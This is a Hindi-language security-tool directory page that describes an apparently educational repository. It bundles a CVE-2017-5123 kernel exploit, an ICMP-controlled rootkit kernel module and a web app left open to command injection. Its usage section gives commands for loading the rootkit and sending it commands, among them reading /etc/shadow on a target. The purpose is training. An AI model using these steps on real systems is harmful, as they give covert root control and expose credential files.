Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2017-5123 — CVE-2017-5123 कर्नेल शोषण, ICMP-आधारित रूटकिट कमांड-एंड-कंट्रोल, और साइबर सुरक्षा प्रशिक्षण के लिए OS कमांड इंजेक्शन संवेदनशील वेब एप्लिकेशन का शैक्षिक प्रदर्शन। | Kitploit
उपकरण/GitHubGitHub/nabilboudra/cve-2017-5123
विशेषाधिकार वृद्धिशोषणवेब एप्लिकेशन शोषणकमांड एंड कंट्रोललर्निंग और शिक्षापेलोड डेवलपमेंटबाइनरी शोषणलैब और अभ्यास
GitHubnabilboudra/cve-2017-5123

cve-2017-5123

CVE-2017-5123 कर्नेल शोषण, ICMP-आधारित रूटकिट कमांड-एंड-कंट्रोल, और साइबर सुरक्षा प्रशिक्षण के लिए OS कमांड इंजेक्शन संवेदनशील वेब एप्लिकेशन का शैक्षिक प्रदर्शन।

रिपॉजिटरी देखें
8 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2017-5123

यह रिपॉजिटरी CVE-2017-5123 का एक प्रदर्शन शामिल करती है, जो एक ICMP कमांड-एंड-कंट्रोल बैकडोर है, और एक CWE-78 (OS कमांड इंजेक्शन) संवेदनशील वेब ऐप है।

CSC 4308 - चैलेंज 3 का भाग।

पूर्वापेक्षाएँ

  • लिनक्स कर्नेल: 4.13 से लेकर (लेकिन 4.13.7 को छोड़कर)
  • Node.js: 10.x
  • npm: 6.x

अवलोकन

यह प्रोजेक्ट तीन अलग-अलग सुरक्षा अनुसंधान घटकों को प्रदर्शित करता है:

1. CVE-2017-5123 कर्नेल एक्सप्लॉइट (lkm/rootkit.c)

Linux कर्नेल 4.13 में प्रस्तुत waitid सिस्टम कॉल भेद्यता का एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। यह भेद्यता विशेषाधिकार वृद्धि और सैंडबॉक्स एस्केप की अनुमति देती है।

  • CVE ID: CVE-2017-5123
  • : CWE-787 (आउट-ऑफ-बाउंड्स राइट)
CWE ID
  • प्रभाव: स्थानीय विशेषाधिकार वृद्धि
  • एक्सप्लॉइट लेखक: Chris Salls (@chris_salls)
  • 2. कर्नेल रूटकिट LKM (lkm/lkm.c)

    एक दुर्भावनापूर्ण Linux कर्नेल मॉड्यूल (LKM) जो ICMP इको (पिंग) पैकेट के माध्यम से एक गुप्त कमांड-एंड-कंट्रोल चैनल लागू करता है।

    • CWE ID: CWE-912 (छिपी हुई कार्यक्षमता)
    • कार्यक्षमता:
      • अनुक्रम संख्या 25678 के साथ ICMP इको अनुरोधों को इंटरसेप्ट करता है
      • ICMP पेलोड से शेल कमांड निकालता है
      • रूट के रूप में कमांड निष्पादित करता है
      • ICMP इको रिप्लाई पैकेट के माध्यम से कमांड आउटपुट लौटाता है

    3. संवेदनशील वेब एप्लिकेशन (vulnerable-app/)

    एक React + Node.js फ़ाइल-शेयरिंग एप्लिकेशन जो OS कमांड इंजेक्शन के प्रति संवेदनशील है।

    • CWE ID: CWE-78 (OS कमांड इंजेक्शन)
    • कमज़ोरी: फ़ाइल सामग्री फ़ील्ड में शेल मेटाकैरेक्टर इंजेक्शन

    4. ICMP डेटा पिंगर (pinger/data-ping.c)

    एक उपयोगिता जो कर्नेल रूटकिट बैकडोर के साथ संचार करने के लिए कस्टम पेलोड के साथ ICMP इको अनुरोध भेजती है।

    उपयोग

    LKM लोड करना

    कर्नेल मॉड्यूल बनाएं

    root@kitploit:~
    cd lkm
    make
    

    कर्नेल मॉड्यूल लोड करें

    root@kitploit:~
    sudo insmod lkm.ko
    

    पिंगर क्लाइंट बनाएं

    root@kitploit:~
    cd ../pinger
    gcc -o data-ping data-ping.c
    

    ICMP के माध्यम से कमांड भेजें

    root@kitploit:~
    # रॉ सॉकेट का उपयोग करने के लिए रूट के रूप में चलना आवश्यक है
    sudo ./data-ping <target-ip> "whoami"
    sudo ./data-ping localhost "ls -la /root"
    sudo ./data-ping 192.168.1.100 "cat /etc/shadow"
    

    मॉड्यूल अनलोड करें

    root@kitploit:~
    sudo rmmod lkm
    

    त्वरित पुनः लोड

    root@kitploit:~
    make reload
    

    संवेदनशील वेब एप्लिकेशन चलाना

    root@kitploit:~
    # फ्रंटएंड बनाएं
    cd vulnerable-app/frontend
    npm run build
    
    # बिल्ड को बैकएंड में कॉपी करें
    cp -r build ../backend/
    
    # बैकएंड सर्वर शुरू करें (एपीआई और फ्रंटएंड दोनों प्रदान करता है)
    cd ../backend
    npm start
    

    एप्लिकेशन http://localhost:3001 पर उपलब्ध होगा।

    संदर्भ

    • CVE-2017-5123: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5123
    • CWE-78: https://cwe.mitre.org/data/definitions/78.html
    • CWE-787: https://cwe.mitre.org/data/definitions/787.html
    • CWE-912: https://cwe.mitre.org/data/definitions/912.html
    • Chris Salls का मूल एक्सप्लॉइट कोड: https://github.com/salls/kernel-exploits
    टूल डाउनलोड करें